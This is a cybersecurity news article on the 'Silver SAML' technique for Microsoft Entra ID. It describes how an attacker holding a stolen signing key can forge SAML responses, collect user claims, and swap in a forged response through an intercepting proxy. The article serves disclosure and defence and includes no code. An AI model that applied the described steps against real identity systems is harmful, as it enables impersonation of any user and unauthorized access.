Saturday, October 5, 2024
HomeCVE/vulnerabilityNew Silver SAML Attack Let Attackers Forge Any SAML Response To Entra...

New Silver SAML Attack Let Attackers Forge Any SAML Response To Entra ID

Published on

SolarWinds cyberattack was one of the largest attacks of the century in which attackers used the Golden SAML attack in post-breach exploitation to affect thousands of organizations all over the world including the United States government for deploying malicious code into Orion IT management and monitoring software. 

After the massive cyberattack, CISA recommended hybrid environment organizations to move to a cloud identity system such as Entra ID.

However, a new technique dubbed Silver SAML has been discovered which could bypass security recommendations and exploit Entra ID using applications.

- Advertisement - EHA

Though this vulnerability has been rated as MODERATE risk to organizations, depending upon the compromised system, this Silver SAML authentication can be used to gain unauthorized access to business-critical applications that pose a SEVERE risk.

Silver SAML Attack

According to the reports shared with Cyber Security News, Entra ID is used by several organizations that use SAML for authenticating into applications.

However, this Entra ID uses a self-signed certificate for SAML response signing. Additionally, organizations can also use externally generated certificates to sign the SAML.

Silver SAML attack workflow (Source: Semperis)

Golden SAML authentication is well-known for its extraction of signing certificates from Active Directory Federation Services and using them to forge SAML authentication responses.

The Silver SAML attack does not use the ADFS in Microsoft Entra ID.

Suppose an attacker obtains the private key of an externally generated certificate. In that case, the attacker can forge any SAML response as they please and sign the response with the same private key that Entra ID holds.

If this attack is successful, the attacker can gain access to the application as any user.

Issue Behind SAML And Signing Certificates

The main issue with the SAML and signing certificates is that most of the organizations do not correctly manage signing certificates.

Additionally, the SAML security is weakened as they use externally signed certificates.

In addition to this, these externally signed certificates are also used to send certificate PFX files and passwords using insecure channels like Teams or Slack.

Even for organizations that use Azure Key Vault, a secure place to store self-signed certificates can also be infiltrated and extracted the keys.

Apart from this, organizations also manage SAML signing certificates externally instead of using the Entra ID.

Performing A Silver SAML Attack

To launch the attack in a Service Provided initiated flow, a threat actor needs to intercept the SAML request and replace the contents of the SAML response with a forged SAML response which could be done using an intercepting proxy such as Burp Suite.

An example of this attack was demonstrated with the test flow by researchers. The SAML response for a user oktaAdministrator@xd6z7.onmicrosoft.com was intercepted.

For exploitation, some of the SAML claims information such as UPN (User Principal Name), surname, firstname, displayName, and objectID need to be collected, which can be done using the Entra admin center or Microsoft Graph API.

Intercepting the SAML response (Source: Semperis)

With the researchers created tool “SilverSAMLForger”, the required parameters are generated as a base64 and URL encoded output string.

This forged SAML response can then be used to replace the SAML response in the intercepted response, making the application log in as a targeted user.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Prince Ransomware Hits UK and US via Royal Mail Phishing Scam

A new ransomware campaign targeting individuals and organizations in the UK and the US...

Microsoft, DOJ Dismantle Domains Used by Russian FSB-Linked Hacking Group

Microsoft and the U.S. Department of Justice (DOJ) have successfully dismantled a network of...

Cloud Penetration Testing Checklist – 2024

Cloud Penetration Testing is a method of actively checking and examining the Cloud system...

Linux Malware perfctl Attacking Millions of Linux Servers

Researchers have uncovered a sophisticated Linux malware, dubbed "perfctl," actively targeting millions of Linux...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Prince Ransomware Hits UK and US via Royal Mail Phishing Scam

A new ransomware campaign targeting individuals and organizations in the UK and the US...

Microsoft, DOJ Dismantle Domains Used by Russian FSB-Linked Hacking Group

Microsoft and the U.S. Department of Justice (DOJ) have successfully dismantled a network of...

Linux Malware perfctl Attacking Millions of Linux Servers

Researchers have uncovered a sophisticated Linux malware, dubbed "perfctl," actively targeting millions of Linux...